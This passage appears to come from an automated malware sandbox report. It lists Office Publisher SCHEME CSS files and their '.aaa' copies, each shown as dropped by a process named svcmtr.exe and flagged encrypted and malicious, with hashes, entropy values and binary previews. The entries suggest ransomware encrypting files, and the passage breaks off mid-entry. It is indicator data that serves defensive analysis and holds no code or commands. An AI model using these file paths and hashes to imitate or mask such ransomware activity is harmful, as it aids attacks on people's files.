                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..w.$.r..}..... .D......s.3.j...~....V}..N.U.S.....'.q...\.D.m...6. .x.-.)Z....ej.[n.<...o.1.dy...<.{..UoI...#..,!.@.......u.4....W.*aD.u).s.... ./Z6..O.......+.W..j.....}-".UZnM.....C.....(.P..v+,.......%._:.SD.@.*.&:..'../.8<..U5E~@M.$rM1+L..].Mr....Lj..|....c..n>T.5....8............w..z.d...._..0.iv.............0@o.......9...@lv....A..3. .._#;l.&.B........]2..R.(.{......g......qiF#:.11...r...$m~.K.....!.QH.|QO~J.....o..%..@~...g..OL..8fe..>7Nj....UgA..#(...w..O..l..fi.w...._t?.....r..'.....!ls....|.!.P.Or..Z.2...,..n.I..%y.._..y..9rz.&.]k!...U..i.n~q...v.3.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132590
                                                                                                                          Entropy (8bit):7.998533677693934
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:KD9CrTNq5kpyjVqSXlH39plfc6VLHmok+Ez+COW9:Kx4TsCpyBjtXfLYZIi
                                                                                                                          MD5:84F67D72EBC825226C9FAA825B2550B9
                                                                                                                          SHA1:CF34FF635946CE8EE53A09B7AAD92223BD7A7FCD
                                                                                                                          SHA-256:4186900B152364457C835FB2FE377B445A7C60625216225877006883C45BA2D1
                                                                                                                          SHA-512:E0CD0D206AEC1E629150491897A81DC1C3A295212727A48F5A8851EE4791D15FA0B7DD542A2F86FACEA6D0504436D48BFFC72DDFAEAE330B868267270593AE76
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..w.$.r..}..... .D......s.3.j...~....V}..N.U.S.....'.q...\.D.m...6. .x.-.)Z....ej.[n.<...o.1.dy...<.{..UoI...#..,!.@.......u.4....W.*aD.u).s.... ./Z6..O.......+.W..j.....}-".UZnM.....C.....(.P..v+,.......%._:.SD.@.*.&:..'../.8<..U5E~@M.$rM1+L..].Mr....Lj..|....c..n>T.5....8............w..z.d...._..0.iv.............0@o.......9...@lv....A..3. .._#;l.&.B........]2..R.(.{......g......qiF#:.11...r...$m~.K.....!.QH.|QO~J.....o..%..@~...g..OL..8fe..>7Nj....UgA..#(...w..O..l..fi.w...._t?.....r..'.....!ls....|.!.P.Or..Z.2...,..n.I..%y.._..y..9rz.&.]k!...U..i.n~q...v.3.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):133326
                                                                                                                          Entropy (8bit):7.998783408851753
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:mj++6NkrSgJ13gVFE9oqOU0oTM0mTfJ0S0jaZLg8l:tPNSF3gDE9oqOU0oYx0SU78l
                                                                                                                          MD5:4CD89FA4D8A5CB5EC817CA4402CA24A3
                                                                                                                          SHA1:5B60374518AD7413B1BFB05735614545C8F99944
                                                                                                                          SHA-256:F350D0A50E6D8A02408C038453162C4DF03B2246C6AE08C067125F058941B597
                                                                                                                          SHA-512:FE51A495D530DDF6153F8187002FD592E5923E51BFB3E1E45EFEA09789270C223F44AD4038E6049557C80CF23D816471E1B10406BDB7DC90921D10B83F4716A0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...p.Q..{d..4....g*....g...IYlr..j'......8)...F../.....6Y..8..%..-...z~......... ..5...S.......oj,.....Gv......!k4.._..c..d...f.c7.!.Yn......U[./..E%].............c....t...7.b.p."..`@j.u.p........o.\8..L....~B..J_.=...b.w*#..2.....V.3..&N......m.......V.cp4w..)x_...\!..zb.-...j[.@.I;..=.a9v....MC=\{~.V.-.."#)iW..........g.V......8...T.--.d..y.=).3.L}Srd...xs..r.ew|..ND.Z./..W..1....V..f...=.$.\{.y.{WzLc....A.S.......>f.2.....QH4....m14[......,.W ..O.....Q.]..6....^.[.1qz$<f?l..7.cj(..........PU\"N.'.y.5....5q.`..H..NO*.e..U..[.o.-l..Qo2.s.....?&wLo....Y......)..'..l.,...5.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):133326
                                                                                                                          Entropy (8bit):7.998783408851753
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:mj++6NkrSgJ13gVFE9oqOU0oTM0mTfJ0S0jaZLg8l:tPNSF3gDE9oqOU0oYx0SU78l
                                                                                                                          MD5:4CD89FA4D8A5CB5EC817CA4402CA24A3
                                                                                                                          SHA1:5B60374518AD7413B1BFB05735614545C8F99944
                                                                                                                          SHA-256:F350D0A50E6D8A02408C038453162C4DF03B2246C6AE08C067125F058941B597
                                                                                                                          SHA-512:FE51A495D530DDF6153F8187002FD592E5923E51BFB3E1E45EFEA09789270C223F44AD4038E6049557C80CF23D816471E1B10406BDB7DC90921D10B83F4716A0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...p.Q..{d..4....g*....g...IYlr..j'......8)...F../.....6Y..8..%..-...z~......... ..5...S.......oj,.....Gv......!k4.._..c..d...f.c7.!.Yn......U[./..E%].............c....t...7.b.p."..`@j.u.p........o.\8..L....~B..J_.=...b.w*#..2.....V.3..&N......m.......V.cp4w..)x_...\!..zb.-...j[.@.I;..=.a9v....MC=\{~.V.-.."#)iW..........g.V......8...T.--.d..y.=).3.L}Srd...xs..r.ew|..ND.Z./..W..1....V..f...=.$.\{.y.{WzLc....A.S.......>f.2.....QH4....m14[......,.W ..O.....Q.]..6....^.[.1qz$<f?l..7.cj(..........PU\"N.'.y.5....5q.`..H..NO*.e..U..[.o.-l..Qo2.s.....?&wLo....Y......)..'..l.,...5.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131550
                                                                                                                          Entropy (8bit):7.998745199118534
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:cfJCdY5cEnzCoifKl8fD+/WuwfaV+ioDLzhb:cZc+CNClQD+/WuwSgioDLzR
                                                                                                                          MD5:AA911201E350D4BF40E4CFD04BF910C8
                                                                                                                          SHA1:1A9E51706261324B6E935B253CD85CD73DF083EB
                                                                                                                          SHA-256:9B859BE76EA2F434B53CA6D667A40C129A1668FAEA86A16BF0222A9830E1DA08
                                                                                                                          SHA-512:59852AF0788B6ECC55693023B470289F61B867A5722FFAE9DE5020672E21CC021B5098ED0CE7D262305A3C78072511CCB99CB4A2DCE58FEAB994AAD6EA9DBFEE
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..*......".g.P.$0...".k...t`...........(.w5r.fG....%:..........2.4./v..-.d.S...N..."...-}....{R..'.t.6X}..L,...}..+....:Xq.Z.kz.............I....... .2.d...yD..7.M..<~.B.j..#....x..k.B{.....{....p..3i.h...T..|..f9P.;O.9bVO.q.h@...nN.*@..........7..4.C[?..5_o.(.b......K....O..rh..o..p.Yh.%.7..3h......f..z....n.e..t..!.._w-..q..Z...I.{.)ri.kc....6..S....~;....i^..W#...w..Zs..t`Q.;.5..b..l5X.Xl.......-.`.6..._..q...g.......V...75.\....m.{.C.K..69.(P:.d..V.....hMQ..bm.Pe.....6..:..}....3.J......".S_jqPB.......l.7...R|.+*.l.+..+',.$xP...@....&..`A.^...z.kR.aQh....m.=.^pk}y..'..-.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131550
                                                                                                                          Entropy (8bit):7.998745199118534
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:cfJCdY5cEnzCoifKl8fD+/WuwfaV+ioDLzhb:cZc+CNClQD+/WuwSgioDLzR
                                                                                                                          MD5:AA911201E350D4BF40E4CFD04BF910C8
                                                                                                                          SHA1:1A9E51706261324B6E935B253CD85CD73DF083EB
                                                                                                                          SHA-256:9B859BE76EA2F434B53CA6D667A40C129A1668FAEA86A16BF0222A9830E1DA08
                                                                                                                          SHA-512:59852AF0788B6ECC55693023B470289F61B867A5722FFAE9DE5020672E21CC021B5098ED0CE7D262305A3C78072511CCB99CB4A2DCE58FEAB994AAD6EA9DBFEE
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..*......".g.P.$0...".k...t`...........(.w5r.fG....%:..........2.4./v..-.d.S...N..."...-}....{R..'.t.6X}..L,...}..+....:Xq.Z.kz.............I....... .2.d...yD..7.M..<~.B.j..#....x..k.B{.....{....p..3i.h...T..|..f9P.;O.9bVO.q.h@...nN.*@..........7..4.C[?..5_o.(.b......K....O..rh..o..p.Yh.%.7..3h......f..z....n.e..t..!.._w-..q..Z...I.{.)ri.kc....6..S....~;....i^..W#...w..Zs..t`Q.;.5..b..l5X.Xl.......-.`.6..._..q...g.......V...75.\....m.{.C.K..69.(P:.d..V.....hMQ..bm.Pe.....6..:..}....3.J......".S_jqPB.......l.7...R|.+*.l.+..+',.$xP...@....&..`A.^...z.kR.aQh....m.=.^pk}y..'..-.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123454
                                                                                                                          Entropy (8bit):7.998445226522374
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/YxYSVZmaG3jy84ysHRxH05oMIL9TGYuQCVAE:/Yx7SacyBaoMwGzt
                                                                                                                          MD5:F03340BA1D05C2B919F05DE4C563E238
                                                                                                                          SHA1:292F937EC18A2E84FE99427EF8EF6410C7A99EDC
                                                                                                                          SHA-256:BBD548BB8AA111B333AC603B7397AF38F0929BD29107A60C835E2A893F954F57
                                                                                                                          SHA-512:D9A4FD840498C8CADAB8C266DBB2112F9FC4F7EC86475A299C370582B54F7BED228459568558BF064C8225F0212569BC7758AE750EDC1DEC2A9906656D825F39
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..4.@:."~@J}..F.s....K...m.?8.Y..L..T..&...m(>..G.O..I...A...k.[.'...,G./.....*.o...W.1..E.N..^.e..Kz}..l........f.O.=...L..u.&....M..eeu..n.H.h...J.~,(;x...".+.T..1Sak...3.....L....k..n7.[.....7$.l..s.N....\.y.....i...5:..Q...._-._f..T..YM.-..P?.M....G.N4.....snw:r7..N..G..:....Tw..\O..{......N..z...MT.hZ..8....!....9.f..M'?.}n.}.......A.-..:..E.G...Fz.mS.^l.F.....y..7j...`3....D/&..I.C{n...]Y....P....5+........S.'.+......= ..."W=.yV..p.8..e.!E....Y.J...S<....h.....3..}7;3D....f.....H..f. . hY...Cx7.".ig.^t...o..$+.|..p..... ......7.a....0.*....AT...Ep.Y..z5.y{..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123454
                                                                                                                          Entropy (8bit):7.998445226522374
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/YxYSVZmaG3jy84ysHRxH05oMIL9TGYuQCVAE:/Yx7SacyBaoMwGzt
                                                                                                                          MD5:F03340BA1D05C2B919F05DE4C563E238
                                                                                                                          SHA1:292F937EC18A2E84FE99427EF8EF6410C7A99EDC
                                                                                                                          SHA-256:BBD548BB8AA111B333AC603B7397AF38F0929BD29107A60C835E2A893F954F57
                                                                                                                          SHA-512:D9A4FD840498C8CADAB8C266DBB2112F9FC4F7EC86475A299C370582B54F7BED228459568558BF064C8225F0212569BC7758AE750EDC1DEC2A9906656D825F39
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..4.@:."~@J}..F.s....K...m.?8.Y..L..T..&...m(>..G.O..I...A...k.[.'...,G./.....*.o...W.1..E.N..^.e..Kz}..l........f.O.=...L..u.&....M..eeu..n.H.h...J.~,(;x...".+.T..1Sak...3.....L....k..n7.[.....7$.l..s.N....\.y.....i...5:..Q...._-._f..T..YM.-..P?.M....G.N4.....snw:r7..N..G..:....Tw..\O..{......N..z...MT.hZ..8....!....9.f..M'?.}n.}.......A.-..:..E.G...Fz.mS.^l.F.....y..7j...`3....D/&..I.C{n...]Y....P....5+........S.'.+......= ..."W=.yV..p.8..e.!E....Y.J...S<....h.....3..}7;3D....f.....H..f. . hY...Cx7.".ig.^t...o..$+.|..p..... ......7.a....0.*....AT...Ep.Y..z5.y{..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126526
                                                                                                                          Entropy (8bit):7.998564999149565
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:MJbOqpwvnFHFCXaR+HxShrTZ/XjOUJec1:Df1RkcZ/TOUD
                                                                                                                          MD5:440CAEE76CAAD54FCDE6D231F74E2766
                                                                                                                          SHA1:A3BB10310671F4A0299EE8ACEB84366B990843FF
                                                                                                                          SHA-256:D93DA82CD4FF9F31E840259A185CE99F000A50CB382FF47E3B23831C28A8CEC7
                                                                                                                          SHA-512:FEB1D17C8D17D12486907DC2D698D25CF5420E48348090760054E8F9232588D79504DCC18C5F440CA5A2E318092B0AB18B941BDA1D7AF2C83A30B46C6A5AFB5E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....B.2...z.&...c......b'.sx..X...q9..`i..,w....s...f.{.,.".Gm..'M5S`1w]..HwV.......U/.L......v..a$N?.."........qC.ihF....9.?...).j..o.."....../T+.Gw....Zu...A..K..E.6'..Ds:.....^;.M.R.(...p...0...)..|.U...."i....G.0.y .b(........&..s...%"95.P...8+..[.`3.!.eg.$5.V..I.....[.j.8w......H....Xr..6..V.9.`....Do....s...8.....}.r..;..`.{(..v.......!..?. r.5....g.:.H.jP........UD.bl..U....9.7..k...aV..$ y.x..=...T.?....d..:..0.4.h..(.......v..X.p.....F...?4k...J.!...r...:.N@.....,.h|.@/..0.a.+.gA.J.jV.3...YA.zE...|e..9....M.....o-..,Q...m.0.v.7.....P-....@..+.6B..s,

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126526
                                                                                                                          Entropy (8bit):7.998564999149565
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:MJbOqpwvnFHFCXaR+HxShrTZ/XjOUJec1:Df1RkcZ/TOUD
                                                                                                                          MD5:440CAEE76CAAD54FCDE6D231F74E2766
                                                                                                                          SHA1:A3BB10310671F4A0299EE8ACEB84366B990843FF
                                                                                                                          SHA-256:D93DA82CD4FF9F31E840259A185CE99F000A50CB382FF47E3B23831C28A8CEC7
                                                                                                                          SHA-512:FEB1D17C8D17D12486907DC2D698D25CF5420E48348090760054E8F9232588D79504DCC18C5F440CA5A2E318092B0AB18B941BDA1D7AF2C83A30B46C6A5AFB5E
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....B.2...z.&...c......b'.sx..X...q9..`i..,w....s...f.{.,.".Gm..'M5S`1w]..HwV.......U/.L......v..a$N?.."........qC.ihF....9.?...).j..o.."....../T+.Gw....Zu...A..K..E.6'..Ds:.....^;.M.R.(...p...0...)..|.U...."i....G.0.y .b(........&..s...%"95.P...8+..[.`3.!.eg.$5.V..I.....[.j.8w......H....Xr..6..V.9.`....Do....s...8.....}.r..;..`.{(..v.......!..?. r.5....g.:.H.jP........UD.bl..U....9.7..k...aV..$ y.x..=...T.?....d..:..0.4.h..(.......v..X.p.....F...?4k...J.!...r...:.N@.....,.h|.@/..0.a.+.gA.J.jV.3...YA.zE...|e..9....M.....o-..,Q...m.0.v.7.....P-....@..+.6B..s,

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128878
                                                                                                                          Entropy (8bit):7.998374238352071
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:RviQITR8zhahzwDdhqSl3skcWFOCky0rBbP8zl9r2csw0TXMhOn:cQjzG0dhq4uWFmJhP2f2/B4kn
                                                                                                                          MD5:A9139194BF3BDB53EE1F063A7F143136
                                                                                                                          SHA1:E420C847BE020F327328B6A8F05509ABA60E8490
                                                                                                                          SHA-256:FDFAC6B95D3F189C3696F9E3AAAEC149327040E30FBD556984F84B0557065205
                                                                                                                          SHA-512:2EAEAD34118C493BE9386524A6396284CBA0CD3350479F5E3831E81B205EE6F188B4802EA1D8B1B93E18168AA3FA678757121B0A614ECD3DEC0E066376EA67A3
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..s.C..Jt..C.m.........]!.aX...x.O.............}.P_.&y.ur. ..:_:.v..m..4.x.0..1.....t...:......3Cu{...nq\8.i@...ttC...FH.MU ...G.S..B..y`.B.CpD}t.....~....3.o.8,9..v..g^.h&.l(..B...,-.a..;....=.u.G..4..n...../.k.jV.M.N.j....*.V....4..3.LRZ..T.oHDX.:.,$^<2...........5..ZK.(v.k....@%...G... .$...`......^,.........E......F%...0z.%...f.B.Cl)...(.x...w.|^l,.'r....!..Cr...e...&..K...9_.N..()V....^.5._GY.u.QG.=..n.}b{.N.I.)...`g.H.#.[3.........MB..&.....Cs/+.zb...U-.....O..1.k..D.M..*...;..{...k..yP....&.>.f..{.....v5Y1.^..2.....A*U.....".H.T....O.........o..W.2..T..........?q]

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128878
                                                                                                                          Entropy (8bit):7.998374238352071
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:RviQITR8zhahzwDdhqSl3skcWFOCky0rBbP8zl9r2csw0TXMhOn:cQjzG0dhq4uWFmJhP2f2/B4kn
                                                                                                                          MD5:A9139194BF3BDB53EE1F063A7F143136
                                                                                                                          SHA1:E420C847BE020F327328B6A8F05509ABA60E8490
                                                                                                                          SHA-256:FDFAC6B95D3F189C3696F9E3AAAEC149327040E30FBD556984F84B0557065205
                                                                                                                          SHA-512:2EAEAD34118C493BE9386524A6396284CBA0CD3350479F5E3831E81B205EE6F188B4802EA1D8B1B93E18168AA3FA678757121B0A614ECD3DEC0E066376EA67A3
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..s.C..Jt..C.m.........]!.aX...x.O.............}.P_.&y.ur. ..:_:.v..m..4.x.0..1.....t...:......3Cu{...nq\8.i@...ttC...FH.MU ...G.S..B..y`.B.CpD}t.....~....3.o.8,9..v..g^.h&.l(..B...,-.a..;....=.u.G..4..n...../.k.jV.M.N.j....*.V....4..3.LRZ..T.oHDX.:.,$^<2...........5..ZK.(v.k....@%...G... .$...`......^,.........E......F%...0z.%...f.B.Cl)...(.x...w.|^l,.'r....!..Cr...e...&..K...9_.N..()V....^.5._GY.u.QG.=..n.}b{.N.I.)...`g.H.#.[3.........MB..&.....Cs/+.zb...U-.....O..1.k..D.M..*...;..{...k..yP....&.>.f..{.....v5Y1.^..2.....A*U.....".H.T....O.........o..W.2..T..........?q]

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123454
                                                                                                                          Entropy (8bit):7.998163291988781
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:yBx0O3cXQ6Ezrm5OTdWVUuvnsy8BvhV+ippuALPqtfEEULNxodTWj3/qO31k:WSXirrRW2uvsxvhQSLitfv0/gij3yOFk
                                                                                                                          MD5:438C468DD46D40DD48FC87FAFDEF6710
                                                                                                                          SHA1:3AF7043320730C17D450C0BB7DDA8D152CD5C84F
                                                                                                                          SHA-256:178DB582130153DD924023DF489118E4F193C9A9F530E9C736AF6FA1F0C795F5
                                                                                                                          SHA-512:316328415C68BA5F85E7AACF9C4D7A79A89BEE1E8AF5EBDFCB7BD6A974129B99AEA5E81895BD66B36D76A43C3DAEAFE4EBAAE88A61C511E2AD7E7BFF032F43FB
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....H._.h[.3c\.S.\.....c..5.NI.'._..w.o.=;LKc.t..as[..5..k..K..a...(..d./N2+:.i...pQ]..G.I..A0..Y.q.........c.C.1...#..`.B`T......a.$...:..../O..5Q..a.A-4........#...?H..4.@9...+vy...5o.ew;..a..:ot.c.l.I..........]+..6.0.8...)J.z:l.@.mnA...D...\...y...2..mL.1E>...&4....6....q.]..}WZ...4m.....BX..?.....k.p......%....B.`.....m.aF^.....9..x6.o........,>..[...>..\j)..f.Y..|.LB..^.*..t..NmDA4..........2.P.W.J...9....>.......x"O}..h.......w.....JPn....L...r..jp...L......d..m......n.imS4....gK.$....;p.....}.{y...8?....[.a~.O6.F./.d..e2.Ln:W....*.@C.Y.....+....yupn..0$...rS.'....J..ry..;.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123454
                                                                                                                          Entropy (8bit):7.998163291988781
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:yBx0O3cXQ6Ezrm5OTdWVUuvnsy8BvhV+ippuALPqtfEEULNxodTWj3/qO31k:WSXirrRW2uvsxvhQSLitfv0/gij3yOFk
                                                                                                                          MD5:438C468DD46D40DD48FC87FAFDEF6710
